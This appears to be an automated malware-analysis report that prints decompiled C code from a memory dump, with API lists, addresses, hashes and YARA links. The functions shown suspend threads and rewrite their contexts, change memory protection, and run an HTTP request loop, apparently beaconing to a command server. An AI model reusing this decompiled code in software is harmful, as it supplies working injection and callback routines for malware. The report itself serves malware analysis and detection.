				intOrPtr _t41;

				_t41 = _a8;
				_t39 = __eax;
				_v716 = 0x10001;
				_t16 = NtGetContextThread(_a4,  &_v716); // executed
				if(_t16 < 0) {
					L19:
					return _t16;
				}
				if(_t39 != 0xffffffff) {
					_t16 = _t39 + 1;
				} else {
					_t16 =  *0x7098f6e8; // 0x1f
					_t39 = 0;
				}
				if(_t39 >= _t16) {
					goto L19;
				} else {
					_t27 = _t39 * 0x2c;
					_t37 = _v536;
					_t40 = _t16 - _t39;
					do {
						_t32 =  *0x7098f6e0; // 0x2e705a8
						_t19 = _t41;
						_t30 = _t27 + _t32;
						if(_t19 == 0) {
							_t20 = 0;
						} else {
							if(_t19 == 1) {
								_t20 = 1;
							} else {
								_t20 = ( *(_t30 + 0x14) & 0x000000ff) >> 0x00000002 & 0x00000001;
							}
						}
						if((( *(_t30 + 0x14) & 0x000000ff) >> 0x00000001 & 0x00000001) != _t20) {
							if(_t20 == 0) {
								_t20 = E7098B2D0(_t30, _t37);
							} else {
								_t20 = E7098B310(_t30, _t37);
							}
							if(_t20 != 0) {
								_v536 = _t20;
								_t20 = NtSetContextThread(_v0,  &_v720);
								_t37 = _v540;
							}
						}
						_t27 = _t27 + 0x2c;
						_t40 = _t40 - 1;
					} while (_t40 != 0);
					return _t20;
				}
			}



















                                                                                                        0x7098b34e
                                                                                                        0x7098b356
                                                                                                        0x7098b35e
                                                                                                        0x7098b366
                                                                                                        0x7098b36d
                                                                                                        0x7098b419
                                                                                                        0x7098b419
                                                                                                        0x7098b419
                                                                                                        0x7098b376
                                                                                                        0x7098b381
                                                                                                        0x7098b378
                                                                                                        0x7098b378
                                                                                                        0x7098b37d
                                                                                                        0x7098b37d
                                                                                                        0x7098b386
                                                                                                        0x00000000
                                                                                                        0x7098b38c
                                                                                                        0x7098b38f
                                                                                                        0x7098b395
                                                                                                        0x7098b39c
                                                                                                        0x7098b3a0
                                                                                                        0x7098b3a0
                                                                                                        0x7098b3a8
                                                                                                        0x7098b3ab
                                                                                                        0x7098b3ae
                                                                                                        0x7098b3c6
                                                                                                        0x7098b3b0
                                                                                                        0x7098b3b1
                                                                                                        0x7098b3bf
                                                                                                        0x7098b3b3
                                                                                                        0x7098b3ba
                                                                                                        0x7098b3ba
                                                                                                        0x7098b3b1
                                                                                                        0x7098b3d3
                                                                                                        0x7098b3d7
                                                                                                        0x7098b3e0
                                                                                                        0x7098b3d9
                                                                                                        0x7098b3d9
                                                                                                        0x7098b3d9
                                                                                                        0x7098b3e7
                                                                                                        0x7098b3f0
                                                                                                        0x7098b3fd
                                                                                                        0x7098b402
                                                                                                        0x7098b402
                                                                                                        0x7098b3e7
                                                                                                        0x7098b409
                                                                                                        0x7098b40c
                                                                                                        0x7098b40c
                                                                                                        0x00000000
                                                                                                        0x7098b410

                                                                                                        APIs
                                                                                                        • NtGetContextThread.NTDLL ref: 7098B366
                                                                                                        • NtSetContextThread.NTDLL(?,00010001), ref: 7098B3FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ContextThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1591575202-0
                                                                                                        • Opcode ID: 009067ed3b3a58dbe122ec0f1f7aa8276d07acb892df323ce4f0b923a9b5a3b8
                                                                                                        • Instruction ID: 4a694a175ac78823fc30702c200d0174385fc81538d196361ca91f6e57b8596a
                                                                                                        • Opcode Fuzzy Hash: 009067ed3b3a58dbe122ec0f1f7aa8276d07acb892df323ce4f0b923a9b5a3b8
                                                                                                        • Instruction Fuzzy Hash: 082127321092554BC3219B69CC807AF73EDAB84250F68062FE856C33D5E634E94587A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B570, Relevance: 3.0, APIs: 2, Instructions: 42nativethreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B570(long** __eax, intOrPtr _a4) {
				signed int _v0;
				void* __esi;
				long _t10;
				signed int _t16;
				void* _t21;
				intOrPtr* _t23;
				void* _t24;

				_t23 = __eax;
				 *__eax = 0;
				__eax[1] = 0;
				__eax[2] = 0;
				_t10 = E7098B420(__eax);
				if( *_t23 != 0) {
					_t16 = 0;
					if( *((intOrPtr*)(_t23 + 8)) <= 0) {
						L7:
						return _t10;
					}
					do {
						_t10 = E7098B1A0(0x5a, 0,  *((intOrPtr*)( *_t23 + _t16 * 4)));
						_t21 = _t10;
						_t24 = _t24 + 0xc;
						if(_t21 != 0) {
							NtSuspendThread(_t21, 0); // executed
							E7098B340(_v0, _t21, _a4);
							_t24 = _t24 + 8;
							_t10 = NtClose(_t21);
						}
						_t16 = _t16 + 1;
					} while (_t16 <  *((intOrPtr*)(_t23 + 8)));
					goto L7;
				}
				return _t10;
			}










                                                                                                        0x7098b571
                                                                                                        0x7098b573
                                                                                                        0x7098b579
                                                                                                        0x7098b580
                                                                                                        0x7098b587
                                                                                                        0x7098b58f
                                                                                                        0x7098b592
                                                                                                        0x7098b597
                                                                                                        0x7098b5df
                                                                                                        0x00000000
                                                                                                        0x7098b5df
                                                                                                        0x7098b5a0
                                                                                                        0x7098b5aa
                                                                                                        0x7098b5af
                                                                                                        0x7098b5b1
                                                                                                        0x7098b5b6
                                                                                                        0x7098b5bb
                                                                                                        0x7098b5ca
                                                                                                        0x7098b5cf
                                                                                                        0x7098b5d3
                                                                                                        0x7098b5d3
                                                                                                        0x7098b5d8
                                                                                                        0x7098b5d9
                                                                                                        0x00000000
                                                                                                        0x7098b5de
                                                                                                        0x7098b5e1

                                                                                                        APIs
                                                                                                          • Part of subcall function 7098B420: NtQuerySystemInformation.NTDLL ref: 7098B435
                                                                                                          • Part of subcall function 7098B420: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,74B04970,74B05520,00000000), ref: 7098B45B
                                                                                                          • Part of subcall function 7098B420: NtQuerySystemInformation.NTDLL(00000005,00000000,?,?), ref: 7098B47C
                                                                                                          • Part of subcall function 7098B420: GetCurrentProcessId.KERNEL32(?,00000000), ref: 7098B498
                                                                                                          • Part of subcall function 7098B420: GetCurrentThreadId.KERNEL32 ref: 7098B4C6
                                                                                                          • Part of subcall function 7098B420: HeapAlloc.KERNEL32(02E70000,00000000,00000200), ref: 7098B4EA
                                                                                                          • Part of subcall function 7098B420: VirtualFree.KERNEL32(00000000,00000005,00008000,00000005,00000000,?,?), ref: 7098B55B
                                                                                                          • Part of subcall function 7098B1A0: NtOpenThread.NTDLL ref: 7098B1F2
                                                                                                        • NtSuspendThread.NTDLL ref: 7098B5BB
                                                                                                          • Part of subcall function 7098B340: NtGetContextThread.NTDLL ref: 7098B366
                                                                                                          • Part of subcall function 7098B340: NtSetContextThread.NTDLL(?,00010001), ref: 7098B3FD
                                                                                                        • NtClose.NTDLL(00000000), ref: 7098B5D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Thread$AllocContextCurrentInformationQuerySystemVirtual$CloseFreeHeapOpenProcessSuspend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1213046356-0
                                                                                                        • Opcode ID: 8aebaad441f0e4013d7a167b79df0d2a2c825a8757e2b9633e04c531b0e62b52
                                                                                                        • Instruction ID: 4894dc8b234bd52cd0d095f4bb0335948e0a8607d160be0feb6c9d4c6a04d706
                                                                                                        • Opcode Fuzzy Hash: 8aebaad441f0e4013d7a167b79df0d2a2c825a8757e2b9633e04c531b0e62b52
                                                                                                        • Instruction Fuzzy Hash: A60169755002059FD3209E24D8C2B2E73E8AB85B08F28452CF986577E5D7747845CA62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B0B9, Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E7098B0B9(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __edx, long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				void* _t71;
				long _t97;

				_t71 = __eax +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx;
				 *__ebx =  *__ebx + _t71;
				 *__ebx =  *__ebx + _t71 +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__ebx +  *__edx;
				 *((intOrPtr*)(__ecx - 0x75)) =  *((intOrPtr*)(__ecx - 0x75)) + __edx;
				_push(__ecx);
				_v4 = _a4;
				_a4 = _a8;
				_t97 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
				return 0 | _t97 > 0x00000000;
			}






                                                                                                        0x7098b12b
                                                                                                        0x7098b12d
                                                                                                        0x7098b13f
                                                                                                        0x7098b15f
                                                                                                        0x7098b160
                                                                                                        0x7098b16e
                                                                                                        0x7098b177
                                                                                                        0x7098b187
                                                                                                        0x7098b196

                                                                                                        APIs
                                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,7098B7AC,02E705A8,00000000,00000000), ref: 7098B187
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2706961497-0
                                                                                                        • Opcode ID: 95bc77adfee839cf5924cbde05406c824cffcef9ee512e61c2a59762090e386e
                                                                                                        • Instruction ID: 9557c554dadcf7b18ff400f517293005c0bb1bc58cdc5c7849fd592d13a7d5a2
                                                                                                        • Opcode Fuzzy Hash: 95bc77adfee839cf5924cbde05406c824cffcef9ee512e61c2a59762090e386e
                                                                                                        • Instruction Fuzzy Hash: E4F0FE761083519FC705CF58CC92A5A77F4AF8A710B148A5DF1A5C7684D730E414DB63
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709888E0, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 709888EC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AdaptersInfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 3177971545-0
                                                                                                        • Opcode ID: 192d17daf03dfd93050aad1715a0978be718855e5d7bec693f8ad6e3002a57aa
                                                                                                        • Instruction ID: 14272d9cf7e4441651ec9c24dd5d41fef17e497e9eb0208fbe28c243b51d67a9
                                                                                                        • Opcode Fuzzy Hash: 192d17daf03dfd93050aad1715a0978be718855e5d7bec693f8ad6e3002a57aa
                                                                                                        • Instruction Fuzzy Hash: 9201F4372196159FC312CA18DC90ABBF7ADAF99314B11456DE996C7390D336AC0187A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098B160, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098B160(long _a4, long _a8, long _a12, long* _a16) {
				void* _v4;
				long _t13;

				_v4 = _a4;
				_a4 = _a8;
				_t13 = NtProtectVirtualMemory(0xffffffff,  &_v4,  &_a4, _a12, _a16); // executed
				return 0 | _t13 > 0x00000000;
			}





                                                                                                        0x7098b16e
                                                                                                        0x7098b177
                                                                                                        0x7098b187
                                                                                                        0x7098b196

                                                                                                        APIs
                                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,7098B7AC,02E705A8,00000000,00000000), ref: 7098B187
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 2706961497-0
                                                                                                        • Opcode ID: 0041ddc6d5f5d157e550f5aa2c735b6139568f4b9831ecdf922743d275e1f657
                                                                                                        • Instruction ID: f4834655d3d0964c12883c6d5de53fad74d136eb9e86c084fbf88593bcfe08c6
                                                                                                        • Opcode Fuzzy Hash: 0041ddc6d5f5d157e550f5aa2c735b6139568f4b9831ecdf922743d275e1f657
                                                                                                        • Instruction Fuzzy Hash: 7FE092B62083026F8348CF58D851D5BB3E4ABC8620F148A1DB1A5C3690D730D8048B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985A50, Relevance: 73.8, APIs: 41, Strings: 1, Instructions: 306networkmemorysleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E70985A50() {
				WCHAR* _t69;
				void* _t77;
				WCHAR* _t79;
				void* _t82;
				long _t89;
				int _t95;
				void* _t102;
				intOrPtr _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				int _t116;
				int _t119;
				long _t121;
				long _t125;
				intOrPtr _t127;
				void* _t128;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t156;
				void* _t157;
				long _t158;
				long _t160;
				intOrPtr _t161;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;

				 *((intOrPtr*)(_t163 + 0x24)) = 0;
				 *(_t163 + 0x20) = 0;
				_t3 = GetTickCount() + 0x493e0; // 0x493e0
				_t154 = _t3;
				 *(_t163 + 0x38) = _t154;
				while(1) {
					_t127 =  *((intOrPtr*)(_t163 + 0x40));
					_t158 = 0x842a0000;
					if( *(_t127 + 0xc) != 0) {
						_t158 = 0x84aa3300;
					}
					_t69 =  *0x7098f5c8; // 0xa4cec0
					_t152 = InternetOpenW(_t69, 1, 0, 0, 0);
					 *(_t163 + 0x30) = _t152;
					if(_t152 == 0) {
						L28:
						if(GetTickCount() >= _t154) {
							L32:
							return  *((intOrPtr*)(_t163 + 0x24));
						}
						Sleep(0x1388);
						continue;
					}
					 *(_t163 + 0x20) = 0x4e20;
					InternetSetOptionW(_t152, 2, _t163 + 0x14, 4);
					InternetSetOptionW(_t152, 5, _t163 + 0x14, 4);
					InternetSetOptionW(_t152, 6, _t163 + 0x14, 4);
					asm("sbb ecx, ecx");
					_t77 = InternetConnectW(_t152,  *(_t127 + 4), ( ~( *(_t127 + 0xc)) & 0x0000016b) + 0x50, 0, 0, 3, 0, 0); // executed
					_t156 = _t77;
					 *(_t163 + 0x34) = _t156;
					if(_t156 == 0) {
						L26:
						InternetCloseHandle(_t152);
						if( *(_t163 + 0x20) != 0) {
							goto L32;
						}
						_t154 =  *(_t163 + 0x38);
						goto L28;
					}
					_t79 = StrChrW(0x7098cd54, 0x48);
					_t82 = HttpOpenRequestW(_t156, StrChrW(0x7098cd48, 0x50),  *(_t127 + 8), _t79, 0, 0, _t158, 0); // executed
					_t128 = _t82;
					if(_t128 == 0) {
						L25:
						InternetCloseHandle(_t156);
						goto L26;
					}
					_t157 = HeapAlloc(GetProcessHeap(), 8, 0x1000);
					if(_t157 == 0) {
						L24:
						InternetCloseHandle(_t128);
						_t156 =  *(_t163 + 0x34);
						goto L25;
					}
					_push(StrChrW(0x7098cd1c, 0x43));
					_t89 = wsprintfW(_t157, StrChrW(0x7098c564, 0x25));
					_t163 = _t163 + 0xc;
					HttpAddRequestHeadersW(_t128, _t157, _t89, 0xa0000000);
					_t160 = 0;
					 *((intOrPtr*)(_t163 + 0x28)) = 0;
					 *((intOrPtr*)(_t163 + 0x18)) = 0;
					 *(_t163 + 0x1c) = 0;
					 *(_t163 + 0x30) = GetTickCount();
					 *(_t163 + 0x1c) = RtlRandom(_t163 + 0x2c);
					_t153 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					if(_t153 != 0) {
						_push( *((intOrPtr*)(_t163 + 0x44)));
						_push( *(_t163 + 0x14));
						 *(_t163 + 0x38) = _t153;
						_t116 = wsprintfA(_t153, StrChrA(0x7098cca0, 0x2d));
						_t164 = _t163 + 0x10;
						_push( *((intOrPtr*)(_t163 + 0x24)));
						_t160 = _t116;
						_t27 = _t160 + 1; // 0x1
						 *((intOrPtr*)(_t164 + 0x24)) = _t153 + _t27;
						_t119 = wsprintfA( *(_t164 + 0x20), StrChrA(0x7098cc88, 0x2d));
						_t139 =  *((intOrPtr*)(_t164 + 0x4c));
						_t165 = _t164 + 0xc;
						 *(_t165 + 0x1c) = _t119;
						_push( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x4c)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x4c)) + 0x20)) +  *((intOrPtr*)(_t139 + 0x18)) + _t119 + _t160);
						_t121 = wsprintfW(_t157, StrChrW(0x7098cc58, 0x43));
						_t166 = _t165 + 0xc;
						HttpAddRequestHeadersW(_t128, _t157, _t121, 0xa0000000);
						_push( *((intOrPtr*)(_t166 + 0x14)));
						_t125 = wsprintfW(_t157, StrChrW(0x7098cbe0, 0x43));
						_t163 = _t166 + 0xc;
						HttpAddRequestHeadersW(_t128, _t157, _t125, 0xa0000000);
					}
					_t95 = HttpSendRequestExW(_t128, 0, 0, 0, 0); // executed
					if(_t95 == 0) {
						if(GetLastError() == 0x2f7d) {
							 *( *((intOrPtr*)(_t163 + 0x40)) + 0xc) = 0;
						}
						L21:
						if(_t153 != 0) {
							HeapFree(GetProcessHeap(), 0, _t153);
						}
						HeapFree(GetProcessHeap(), 0, _t157);
						_t152 =  *(_t163 + 0x30);
						goto L24;
					}
					 *(_t163 + 0x20) = _t160;
					_t102 = E709858A0(_t128,  *((intOrPtr*)(_t163 + 0x28)), _t163 + 0x14);
					_t163 = _t163 + 0xc;
					_t161 =  *((intOrPtr*)(_t163 + 0x40));
					if(_t102 != _t160) {
						L19:
						HttpEndRequestW(_t128, 0, 0, 0);
						if( *(_t163 + 0x20) != 0) {
							_t104 = E70985900(_t128, _t161 + 0x2c);
							_t163 = _t163 + 8;
							 *((intOrPtr*)(_t163 + 0x24)) = _t104;
						}
						goto L21;
					}
					_t105 = _t161 + 0x18;
					if( *((intOrPtr*)(_t161 + 0x18)) == 0) {
						L13:
						_t106 = _t161 + 0x20;
						if( *((intOrPtr*)(_t161 + 0x20)) == 0) {
							L15:
							_t107 = _t161 + 0x28;
							if( *((intOrPtr*)(_t161 + 0x28)) == 0) {
								L17:
								 *(_t163 + 0x34) =  *(_t163 + 0x1c);
								_t109 = E709858A0(_t128,  *((intOrPtr*)(_t163 + 0x18)), _t163 + 0x28);
								_t163 = _t163 + 0xc;
								if(_t109 ==  *(_t163 + 0x1c)) {
									 *(_t163 + 0x20) = 1;
								}
								goto L19;
							}
							_t110 = E709858A0(_t128,  *((intOrPtr*)(_t161 + 0x24)), _t107);
							_t163 = _t163 + 0xc;
							if(_t110 !=  *((intOrPtr*)(_t161 + 0x28))) {
								goto L19;
							}
							goto L17;
						}
						_t111 = E709858A0(_t128,  *((intOrPtr*)(_t161 + 0x1c)), _t106);
						_t163 = _t163 + 0xc;
						if(_t111 !=  *((intOrPtr*)(_t161 + 0x20))) {
							goto L19;
						}
						goto L15;
					}
					_t113 = E709858A0(_t128,  *((intOrPtr*)(_t161 + 0x14)), _t105);
					_t163 = _t163 + 0xc;
					if(_t113 !=  *((intOrPtr*)(_t161 + 0x18))) {
						goto L19;
					}
					goto L13;
				}
			}




































                                                                                                        0x70985a59
                                                                                                        0x70985a5d
                                                                                                        0x70985a67
                                                                                                        0x70985a67
                                                                                                        0x70985a6d
                                                                                                        0x70985a71
                                                                                                        0x70985a71
                                                                                                        0x70985a79
                                                                                                        0x70985a7e
                                                                                                        0x70985a80
                                                                                                        0x70985a80
                                                                                                        0x70985a85
                                                                                                        0x70985a99
                                                                                                        0x70985a9b
                                                                                                        0x70985aa1
                                                                                                        0x70985dae
                                                                                                        0x70985db6
                                                                                                        0x70985de2
                                                                                                        0x70985ded
                                                                                                        0x70985ded
                                                                                                        0x70985dbd
                                                                                                        0x00000000
                                                                                                        0x70985dbd
                                                                                                        0x70985ab7
                                                                                                        0x70985abf
                                                                                                        0x70985acb
                                                                                                        0x70985ad7
                                                                                                        0x70985ae9
                                                                                                        0x70985af9
                                                                                                        0x70985aff
                                                                                                        0x70985b01
                                                                                                        0x70985b07
                                                                                                        0x70985d9c
                                                                                                        0x70985d9d
                                                                                                        0x70985da8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985daa
                                                                                                        0x00000000
                                                                                                        0x70985daa
                                                                                                        0x70985b21
                                                                                                        0x70985b33
                                                                                                        0x70985b39
                                                                                                        0x70985b3d
                                                                                                        0x70985d95
                                                                                                        0x70985d96
                                                                                                        0x00000000
                                                                                                        0x70985d96
                                                                                                        0x70985b57
                                                                                                        0x70985b5b
                                                                                                        0x70985d8a
                                                                                                        0x70985d8b
                                                                                                        0x70985d91
                                                                                                        0x00000000
                                                                                                        0x70985d91
                                                                                                        0x70985b6a
                                                                                                        0x70985b76
                                                                                                        0x70985b7c
                                                                                                        0x70985b87
                                                                                                        0x70985b8d
                                                                                                        0x70985b8f
                                                                                                        0x70985b93
                                                                                                        0x70985b97
                                                                                                        0x70985ba6
                                                                                                        0x70985bb7
                                                                                                        0x70985bc8
                                                                                                        0x70985bcc
                                                                                                        0x70985bda
                                                                                                        0x70985bdb
                                                                                                        0x70985be3
                                                                                                        0x70985bef
                                                                                                        0x70985bf9
                                                                                                        0x70985bfc
                                                                                                        0x70985bfd
                                                                                                        0x70985c01
                                                                                                        0x70985c0a
                                                                                                        0x70985c1a
                                                                                                        0x70985c20
                                                                                                        0x70985c2a
                                                                                                        0x70985c30
                                                                                                        0x70985c38
                                                                                                        0x70985c48
                                                                                                        0x70985c4e
                                                                                                        0x70985c59
                                                                                                        0x70985c63
                                                                                                        0x70985c73
                                                                                                        0x70985c79
                                                                                                        0x70985c84
                                                                                                        0x70985c84
                                                                                                        0x70985c93
                                                                                                        0x70985c9b
                                                                                                        0x70985dd3
                                                                                                        0x70985dd9
                                                                                                        0x70985dd9
                                                                                                        0x70985d62
                                                                                                        0x70985d64
                                                                                                        0x70985d70
                                                                                                        0x70985d70
                                                                                                        0x70985d80
                                                                                                        0x70985d86
                                                                                                        0x00000000
                                                                                                        0x70985d86
                                                                                                        0x70985cac
                                                                                                        0x70985cb0
                                                                                                        0x70985cb5
                                                                                                        0x70985cba
                                                                                                        0x70985cbe
                                                                                                        0x70985d3d
                                                                                                        0x70985d44
                                                                                                        0x70985d4f
                                                                                                        0x70985d56
                                                                                                        0x70985d5b
                                                                                                        0x70985d5e
                                                                                                        0x70985d5e
                                                                                                        0x00000000
                                                                                                        0x70985d4f
                                                                                                        0x70985cc4
                                                                                                        0x70985cc7
                                                                                                        0x70985cdc
                                                                                                        0x70985ce0
                                                                                                        0x70985ce3
                                                                                                        0x70985cf8
                                                                                                        0x70985cfc
                                                                                                        0x70985cff
                                                                                                        0x70985d14
                                                                                                        0x70985d23
                                                                                                        0x70985d27
                                                                                                        0x70985d2c
                                                                                                        0x70985d33
                                                                                                        0x70985d35
                                                                                                        0x70985d35
                                                                                                        0x00000000
                                                                                                        0x70985d33
                                                                                                        0x70985d07
                                                                                                        0x70985d0c
                                                                                                        0x70985d12
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985d12
                                                                                                        0x70985ceb
                                                                                                        0x70985cf0
                                                                                                        0x70985cf6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985cf6
                                                                                                        0x70985ccf
                                                                                                        0x70985cd4
                                                                                                        0x70985cda
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985cda

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 70985A61
                                                                                                        • InternetOpenW.WININET(00A4CEC0,00000001,00000000,00000000,00000000), ref: 70985A93
                                                                                                        • InternetSetOptionW.WININET ref: 70985ABF
                                                                                                        • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 70985ACB
                                                                                                        • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 70985AD7
                                                                                                        • InternetConnectW.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 70985AF9
                                                                                                        • StrChrW.SHLWAPI(7098CD54,00000048,00000000,00000000,84AA3300,00000000), ref: 70985B21
                                                                                                        • StrChrW.SHLWAPI(7098CD48,00000050,00000001,00000000), ref: 70985B2F
                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000), ref: 70985B33
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001000), ref: 70985B4A
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70985B51
                                                                                                        • StrChrW.SHLWAPI(7098CD1C,00000043), ref: 70985B68
                                                                                                        • StrChrW.SHLWAPI(7098C564,00000025,00000000), ref: 70985B72
                                                                                                        • wsprintfW.USER32 ref: 70985B76
                                                                                                        • HttpAddRequestHeadersW.WININET(00000000,00000000,00000000,A0000000), ref: 70985B87
                                                                                                        • GetTickCount.KERNEL32 ref: 70985B9B
                                                                                                        • RtlRandom.NTDLL ref: 70985BAA
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985BBB
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985BC2
                                                                                                        • StrChrA.SHLWAPI(7098CCA0,0000002D,?,?,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985BE7
                                                                                                        • wsprintfA.USER32 ref: 70985BEF
                                                                                                        • StrChrA.SHLWAPI(7098CC88,0000002D,?), ref: 70985C0E
                                                                                                        • wsprintfA.USER32 ref: 70985C1A
                                                                                                        • StrChrW.SHLWAPI(7098CC58,00000043,?), ref: 70985C40
                                                                                                        • wsprintfW.USER32 ref: 70985C48
                                                                                                        • HttpAddRequestHeadersW.WININET(00000000,00000000,00000000,A0000000), ref: 70985C59
                                                                                                        • StrChrW.SHLWAPI(7098CBE0,00000043,?), ref: 70985C6B
                                                                                                        • wsprintfW.USER32 ref: 70985C73
                                                                                                        • HttpAddRequestHeadersW.WININET(00000000,00000000,00000000,A0000000), ref: 70985C84
                                                                                                        • HttpSendRequestExW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 70985C93
                                                                                                        • HttpEndRequestW.WININET(00000000,00000000,00000000,00000000), ref: 70985D44
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985D69
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985D70
